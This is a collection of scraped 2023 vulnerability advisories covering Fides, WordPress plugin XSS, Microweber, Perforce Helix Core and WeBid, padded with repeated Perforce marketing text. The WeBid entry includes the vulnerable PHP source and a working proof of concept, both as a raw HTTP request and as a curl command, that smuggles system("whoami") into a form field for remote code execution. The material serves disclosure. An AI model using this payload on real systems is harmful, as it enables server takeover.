### Impact

The Fides web application allows data subject users to request access to their personal data. If the request is approved by the data controller user operating the Fides web application, the data subject's personal data can then retrieved from connected systems and data stores before being bundled together as a data subject access request package for the data subject to download. Supported data formats for the package include json and csv, but the most commonly used format is a series of HTML files compressed in a ZIP file. Once downloaded and unzipped, the data subject user can browse the HTML files on their local machine.

It was identified that there was no validation of input coming from e.g. the connected systems and data stores which is later reflected in the downloaded data. This can result in an HTML injection that can be abused e.g. for phishing attacks or malicious JavaScript code execution, but only in the context of the data subject's browser accessing a HTML page using the `file://` protocol.

Exploitation is limited to rogue Admin UI users, malicious connected system / data store users, and the data subject user if tricked via social engineering into submitting malicious data themselves.

### Patches
The vulnerability has been patched in Fides version `TBC`. Users are advised to upgrade to this version or later to secure their systems against this threat.

### Workarounds
Only Fides deployments which have been configured to use `html` as the package format in the [storage destination](https://docs.ethyca.com/dev-docs/configuration/privacy-requests/storage-destinations) are vulnerable. Using `json` or `csv` instead eliminates this vulnerability. 


**Impact**

The Fides web application allows data subject users to request access to their personal data. If the request is approved by the data controller user operating the Fides web application, the data subject's personal data can then retrieved from connected systems and data stores before being bundled together as a data subject access request package for the data subject to download. Supported data formats for the package include json and csv, but the most commonly used format is a series of HTML files compressed in a ZIP file. Once downloaded and unzipped, the data subject user can browse the HTML files on their local machine.

It was identified that there was no validation of input coming from e.g. the connected systems and data stores which is later reflected in the downloaded data. This can result in an HTML injection that can be abused e.g. for phishing attacks or malicious JavaScript code execution, but only in the context of the data subject's browser accessing a HTML page using the file:// protocol.

Exploitation is limited to rogue Admin UI users, malicious connected system / data store users, and the data subject user if tricked via social engineering into submitting malicious data themselves.

**Patches**

The vulnerability has been patched in Fides version TBC. Users are advised to upgrade to this version or later to secure their systems against this threat.

**Workarounds**

Only Fides deployments which have been configured to use html as the package format in the storage destination are vulnerable. Using json or csv instead eliminates this vulnerability.

**References**

*   GHSA-3vpf-mcj7-5h38
*   ethyca/fides@50360a0
*   https://github.com/ethyca/fides/releases/tag/2.23.3

GHSA-3vpf-mcj7-5h38: Ethyca Fides HTML Injection Vulnerability in HTML-Formatted DSR Packages

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in sahumedia SAHU TikTok Pixel for E-Commerce plugin <= 1.2.2 versions.

**Solution**

 No fix

No patched version is available.

Found this useful? Thank Rio Darmawan for reporting this vulnerability. Buy a coffee ☕

Rio Darmawan discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress SAHU TikTok Pixel for E-Commerce Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-46642: WordPress SAHU TikTok Pixel for E-Commerce plugin <= 1.2.2 - Cross Site Scripting (XSS) vulnerability - Patchstack

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in GARY JEZORSKI CloudNet360 plugin <= 3.2.0 versions.

**Solution**

 No fix

No patched version is available.

Nithissh S discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Download CloudNet360 Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-46643: WordPress CloudNet360 plugin <= 3.2.0 - Reflected Cross Site Scripting (XSS) vulnerability - Patchstack

Microweber CMS version 2.0.1 is vulnerable to stored Cross Site Scripting (XSS) via the profile picture file upload functionality.

A Stored XSS vulnerability has been identified in Microweber Version 2.0.1, posing a significant risk to user data. This article explores the vulnerability, its discovery, current status, and mitigation steps.

**Action Points**

1.  Microweber is an open-source drag-and-drop website builder and content management system (CMS).
2.  Stored XSS injects malicious code into web apps via stored user input, and can be used to perform harmful actions such as stealing user cookies, etc.
3.  The Stored XSS vulnerability has been reported to the platform, which is in the process of rolling out a patch soon.
4.  To protect yourselves promptly update to the latest security version once released.

But before we jump into the deep end, let’s understand some basics:

**What is Microweber?**

Microweber is an open-source drag-and-drop website builder. It is a powerful content management system (CMS) that has been installed more than 100,000 times with 40000 + active users. 

However, while running security tests a new Stored XSS Vulnerability has been discovered by Astra’s Security Team in the latest version i.e. Microweber Version 2.0.1, released on October 27, 2023.

Stored Cross-Site Scripting (Stored XSS) is a specific form of XSS attack that injects malicious code into a vulnerable web application, targeting users’ browsers instead of the web server directly.

The attack leverages user input that is saved or “stored” on the target server, including places like a message forum, a visitor log, or a comment field. 

Such an input if not sanitized through input validation, output encoding, and security headers, might be injected with malicious script. When a victim interacts with the compromised web application and requests the stored information, their browser retrieves and executes the malicious code from the server. 

**What is the impact of Stored XSS?**

Stored XSS attacks can have severe consequences, which can vary based on the privileges assigned to the affected user such as:

**1\. Data Theft and Session Hijacking**

Once executed, the malicious code can steal the victim’s data (e.g., cookies and user info), allowing unauthorized access, impersonation, and performing actions on the victim’s behalf (e.g., changing settings, making transactions).

**2\. Malware & ransomware Propagation**

Malicious Scripts used in a Stored XSS attack can also be designed to trigger downloads of malware or ransomware from external sources or exploit vulnerabilities in users’ browsers to deliver malware payloads, potentially compromising their devices and spreading the malware further. 

**Website Defacement:**

Malicious Scripts used in a Stored XSS attack can also be designed to alter the appearance and content of the web page, effectively defacing the website. For example, they replace content, change layouts, or add unwanted ads, leading to a compromised user experience and potential reputation damage. 

**What is the current status?**

Upon discovering the vulnerability in Microweber Version 2.0.1, Astra’s team promptly notified the platform’s developers along with possible solutions that they may implement to avoid any possible exploitation of user data. 

Currently, they are working on implementing a patch while formulating a long-term solution for the vulnerability.

**What can you do?**

Update the affected version to the latest ad-hoc security version once released by Microweber CMS Ltd.

**Sanskriti Jain**

Sanskriti is a technical writer at Astra who believes in writing with purpose and for a purpose. When she is not busy exploring the world of cybersecurity, you will probably find her with her nose buried deep in a book or on the lookout for a perfectly brewed cup of coffee.

CVE-2023-47379: Stored XSS Vulnerability in Microweber Version 2.0.1 - Astra

In Helix Core versions prior to 2023.2, an unauthenticated remote Denial of Service (DoS) via the buffer was identified.  Reported by Jason Geffner.  


**Trending at Perforce**

**Explore Our Products**

**

Enterprises Who Choose Perforce Solutions...

**

Background Image

Achieve ROI within a year.

Background Image

Achieve compliance certifications in record time.

Background Image

Go from three days to 35 minutes for testing.

Background Image

Gain a competitive edge.

Background Image

Avoid security breaches.

Background Image

Innovate and deploy without risk.

Background Image

Save 1,000s of development hours.

Background Image

Accelerate time-to-market regardless of size or complexity.

CUSTOMER REVIEWS

"It is really fast when comes to dealing with data and code. GUI is really simple and easy to use."

"Continues to deliver business value for our organization and delivers on ROI."

"Getting the strategy off the ground, Akana was the perfect partner."

**Over 75% of Fortune 100 Companies Use Perforce**

**

Solutions For Your Industry

**

**Game Development**

**Embedded Systems**

**Automotive**

**Healthcare**

**Government**

**Film & Animation**

**Semiconductor**

**Medical Devices**

**Financial Services**

**Software & Technology**

Solutions For Your Industry

**

Game Development

**

Game development software from Perforce helps you ship better games, fast. Learn how Perforce can accelerate workflows and help you conquer deadlines with version control + project management software.

Game Development

Game development software from Perforce helps you ship better games, fast. Learn how Perforce can accelerate workflows and help you conquer deadlines with version control + project management software.

**

Embedded Systems

**

Embedded developers working on software and hardware trust Perforce solutions to manage everything. This includes 9 of the top 10 semiconductor companies and 8 of the top 10 automotive companies.

Embedded Systems

Embedded developers working on software and hardware trust Perforce solutions to manage everything. This includes 9 of the top 10 semiconductor companies and 8 of the top 10 automotive companies.

**

Automotive

**

For every phase of development. Fit for OEMs and suppliers alike. Developing safe, secure, and reliable automotive software and hardware is difficult. But using the right development tools makes it easy.

Automotive

For every phase of development. Fit for OEMs and suppliers alike. Developing safe, secure, and reliable automotive software and hardware is difficult. But using the right development tools makes it easy.

**

Healthcare

**

Healthcare organizations face the daunting task of maintaining profitability while complying with regulatory mandates such as HIPAA, ICD-10, Meaningful Use Stage 1 and 2, and more.

Healthcare

Healthcare organizations face the daunting task of maintaining profitability while complying with regulatory mandates such as HIPAA, ICD-10, Meaningful Use Stage 1 and 2, and more.

**

Government

**

Many government organizations rely on Perforce for their diverse software development needs. Perforce provides highly secure solutions with complete traceability to help you mitigate risk.

Government

Many government organizations rely on Perforce for their diverse software development needs. Perforce provides highly secure solutions with complete traceability to help you mitigate risk.

**

Film & Animation

**

Computer graphics — which were once exclusively postproduction — are now being combined with onset footage in real time. With crews spread out, filmmakers need to harness a combination of software tools to build something new.

Film & Animation

Computer graphics — which were once exclusively postproduction — are now being combined with onset footage in real time. With crews spread out, filmmakers need to harness a combination of software tools to build something new.

**

Semiconductor

**

The complexity of system on chip (SoC) designs is outpacing the capabilities of engineering. That’s because of two trends:

1.  Increasing design complexity gives rise to increasing data size.
2.  Unforgiving market windows.

Semiconductor

The complexity of system on chip (SoC) designs is outpacing the capabilities of engineering. That’s because of two trends:

1.  Increasing design complexity gives rise to increasing data size.
2.  Unforgiving market windows.

**

Medical Devices

**

There are endless challenges in the medical device industry. The quality of software embedded in medical devices can mean the difference between life and death. And there is increasing scrutiny for both safety and security in devices.

Medical Devices

There are endless challenges in the medical device industry. The quality of software embedded in medical devices can mean the difference between life and death. And there is increasing scrutiny for both safety and security in devices.

**

Financial Services

**

Financial services firms need to comply with strict regulatory mandates. They also need to be profitable. And keep up with consumer expectations. And stay ahead of increasingly tech-savvy competitors.

Financial Services

Financial services firms need to comply with strict regulatory mandates. They also need to be profitable. And keep up with consumer expectations. And stay ahead of increasingly tech-savvy competitors.

**

Software & Technology

**

Enterprises face complex software development challenges today. You need to innovate to accelerate growth. Quality must be high to meet customer expectations. And you must deliver your product to market fast to beat the competition.

Software & Technology

Enterprises face complex software development challenges today. You need to innovate to accelerate growth. Quality must be high to meet customer expectations. And you must deliver your product to market fast to beat the competition.

Solutions For Your Industry

**

Game Development

**

Game development software from Perforce helps you ship better games, fast. Learn how Perforce can accelerate workflows and help you conquer deadlines with version control + project management software.

Game Development

Game development software from Perforce helps you ship better games, fast. Learn how Perforce can accelerate workflows and help you conquer deadlines with version control + project management software.

**

Embedded Systems

**

Embedded developers working on software and hardware trust Perforce solutions to manage everything. This includes 9 of the top 10 semiconductor companies and 8 of the top 10 automotive companies.

Embedded Systems

Embedded developers working on software and hardware trust Perforce solutions to manage everything. This includes 9 of the top 10 semiconductor companies and 8 of the top 10 automotive companies.

**

Automotive

**

For every phase of development. Fit for OEMs and suppliers alike. Developing safe, secure, and reliable automotive software and hardware is difficult. But using the right development tools makes it easy.

Automotive

For every phase of development. Fit for OEMs and suppliers alike. Developing safe, secure, and reliable automotive software and hardware is difficult. But using the right development tools makes it easy.

**

Healthcare

**

Healthcare organizations face the daunting task of maintaining profitability while complying with regulatory mandates such as HIPAA, ICD-10, Meaningful Use Stage 1 and 2, and more.

Healthcare

Healthcare organizations face the daunting task of maintaining profitability while complying with regulatory mandates such as HIPAA, ICD-10, Meaningful Use Stage 1 and 2, and more.

**

Government

**

Many government organizations rely on Perforce for their diverse software development needs. Perforce provides highly secure solutions with complete traceability to help you mitigate risk.

Government

Many government organizations rely on Perforce for their diverse software development needs. Perforce provides highly secure solutions with complete traceability to help you mitigate risk.

**

Film & Animation

**

Computer graphics — which were once exclusively postproduction — are now being combined with onset footage in real time. With crews spread out, filmmakers need to harness a combination of software tools to build something new.

Film & Animation

Computer graphics — which were once exclusively postproduction — are now being combined with onset footage in real time. With crews spread out, filmmakers need to harness a combination of software tools to build something new.

**

Semiconductor

**

The complexity of system on chip (SoC) designs is outpacing the capabilities of engineering. That’s because of two trends:

1.  Increasing design complexity gives rise to increasing data size.
2.  Unforgiving market windows.

Semiconductor

The complexity of system on chip (SoC) designs is outpacing the capabilities of engineering. That’s because of two trends:

1.  Increasing design complexity gives rise to increasing data size.
2.  Unforgiving market windows.

**

Medical Devices

**

There are endless challenges in the medical device industry. The quality of software embedded in medical devices can mean the difference between life and death. And there is increasing scrutiny for both safety and security in devices.

Medical Devices

There are endless challenges in the medical device industry. The quality of software embedded in medical devices can mean the difference between life and death. And there is increasing scrutiny for both safety and security in devices.

**

Financial Services

**

Financial services firms need to comply with strict regulatory mandates. They also need to be profitable. And keep up with consumer expectations. And stay ahead of increasingly tech-savvy competitors.

Financial Services

Financial services firms need to comply with strict regulatory mandates. They also need to be profitable. And keep up with consumer expectations. And stay ahead of increasingly tech-savvy competitors.

**

Software & Technology

**

Enterprises face complex software development challenges today. You need to innovate to accelerate growth. Quality must be high to meet customer expectations. And you must deliver your product to market fast to beat the competition.

Software & Technology

Enterprises face complex software development challenges today. You need to innovate to accelerate growth. Quality must be high to meet customer expectations. And you must deliver your product to market fast to beat the competition.

“I don’t know how we could do the kind of designs and the innovation we do without Perforce. Perforce has been critical to our success.”

Doug Quist

Director of IT and Engineering

“Device management was a huge benefit of the solution. We want to test on the actual devices customers are using. We are simply unwilling to put customers at risk.”

Sharon Chamberlain

Test Automation Manager

"Perforce has been key to us achieving DevOps."

Way Christiansen

Senior Staff Engineer

**When Failure Is Not an Option, You Need the Power of Perforce**

Perforce Software delivers solutions across DevOps designed to help you increase your competitive advantage by addressing quality, security, compliance, collaboration, and speed — across the technology lifecycle.Contact us to learn more about how our solutions can help you accelerate digital transformation, innovate at scale, and achieve DevOps success.

CONTACT USVIEW ALL PRODUCTS

**Sharpen Your Skills, Accelerate Your Teams**

Join upcoming events and webinars with industry-leading experts on how to conquer challenges and drive innovation.

November 10-11, 2023

**ICCAD 2023**

ICCAD 2023

Trade Show

November 12-17, 2023

**SC23**

The international conference for high performance computing, networking, storage, and analysis.

Trade Show

December 4-8, 2023

**Embedded Software Engineering Kongress 2023**

ESE Kongress is Germany’s leading congress for the embedded software industry. Every December, about 1,200 professionals get together to catch up on current technologies and methods, to discuss trends and to set the course for the future.

On the Road

**Award-Winning Innovation: That’s the Power of Perforce**

**SD Times Top 100, Best in Show: Development Tools**

Perforce Software, 2020

**EY Entrepreneur of the Year Heartland Award Winner**

CEO Mark Ties, 2020

**North American Software Testing & QE Awards Finalist**

Perfecto, 2020

**CEDEC Award for Engineering Winner**

Helix Core, 2019

**Get the Power of Perforce Today**

Learn more about how our solutions will help you innovate at scale, achieve higher quality, strengthen security, and accelerate velocity.

**Free Trials**

Get started with a free trial of one of our solutions.

**About Perforce**

Learn more about Perforce solutions for DevOps at scale.

CVE-2023-5759: Perforce Software | Development Tools For Innovation at Scale

WeBid <=1.2.2 is vulnerable to code injection via admin/categoriestrans.php.

vendor: https://github.com/renlok/WeBid

version: <= 1.2.2

php version: 7.x

**Vulnerability description**

A code injection(CWE-94) vulnerability in admin/categoriestrans.php. The $_POST['categories'] as a parameter for rebuild_cat_file is concatenated into the $output and ultimately written to the 'language/' . $lang . '/categories.inc.php' file. The $lang can be controlled by $_GET['lang'], which allows attackers to write the categories.inc.php file into any directory, leading to remote code execution.

    $lang = (isset($_GET['lang'])) ? $_GET['lang'] : $system->SETTINGS['defaultlanguage'];
    $catscontrol = new MPTTcategories();
    
    function search_cats()
    {
        global $catscontrol;
        $catstr = '';
        $root = $catscontrol->get_virtual_root();
        $tree = $catscontrol->display_tree($root['left_id'], $root['right_id'], '|___');
        foreach ($tree as $k => $v) {
            $v = str_replace("'", "\'", $v);
            $catstr .= ",\n" . $k . " => '" . addslashes($v) . "'";
        }
        return $catstr;
    }
    
    function rebuild_cat_file($cats)
    {
        global $lang;
        $output = "<?php\n";
        $output.= "$" . "category_names = array(\n";
    
        $num_rows = count($cats);
    
        $i = 0;
        foreach ($cats as $k => $v) {
            $v = str_replace("'", "\'", $v);
            $output .= "$k => '$v'";
            $i++;
            if ($i < $num_rows) {
                $output .= ",\n";
            } else {
                $output .= "\n";
            }
        }
    
        $output .= ");\n\n";
    
        $output .= "$" . "category_plain = array(\n0 => ''";
    
        $output .= search_cats();
    
        $output .= ");";
    
        $handle = fopen(MAIN_PATH . 'language/' . $lang . '/categories.inc.php', 'w');
        fputs($handle, $output);
        fclose($handle);
    }
    
    if (isset($_POST['categories'])) {
        rebuild_cat_file($_POST['categories']);
        include 'util_cc1.php';
    }
    

The POC is as follows:

    POST /Webid/admin/categoriestrans.php?lang=.. HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: PHPSESSID=vnl6peqqqk68l3pfdvf6f7om92
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: none
    Sec-Fetch-User: ?1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 41
    
    categories[123);system("whoami");/*]=test
    

The curl command to verify vulnerability:

    curl -i -s -k -X $'POST' \
        -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Cookie: PHPSESSID=vnl6peqqqk68l3pfdvf6f7om92' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: none' -H $'Sec-Fetch-User: ?1' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 41' \
        -b $'PHPSESSID=vnl6peqqqk68l3pfdvf6f7om92' \
        --data-binary $'categories[123);system(\"whoami\");/*]=test' \
        $'http://localhost/Webid/admin/categoriestrans.php?lang=..'

CVE-2023-47397: Affected version.md

Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Jens Kuerschner Add to Calendar Button plugin <= 1.5.1 versions.

**Solution**

 Fixed

Update the WordPress Add to Calendar Button plugin to the latest available version (at least 1.5.1).

Found this useful? Thank NGÔ THIÊN AN (ancorn\_ from VNPT-VCI) for reporting this vulnerability. Buy a coffee ☕

NGÔ THIÊN AN (ancorn\_ from VNPT-VCI) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Add to Calendar Button Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.5.1.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-46613: WordPress Add to Calendar Button plugin < 1.5.1 - Cross Site Scripting (XSS) vulnerability - Patchstack

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Ashish Ajani WordPress Simple HTML Sitemap plugin <= 2.1 versions.

**Solution**

 No fix

No patched version is available. No reply from the vendor.

Le Ngoc Anh discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress WP Simple HTML Sitemap Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**Other vulnerabilities in this plugin**

 2 present

 0 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-46627: WordPress WordPress Simple HTML Sitemap plugin <= 2.1 - Cross Site Scripting (XSS) vulnerability - Patchstack

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in FLOWFACT WP Connector plugin <= 2.1.7 versions.

**Solution**

 No fix

No patched version is available. No reply from the vendor.

Jonas Höbenreich discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress FLOWFACT WP Connector Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-46626: WordPress FLOWFACT WP Connector plugin <= 2.1.7 - Reflected Cross Site Scripting (XSS) vulnerability - Patchstack

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Kathy Darling Simple User Listing plugin <= 1.9.2 versions.

**Solution**

 No fix

No patched version is available.

Emili Castells discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Simple User Listing Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

Tag

#web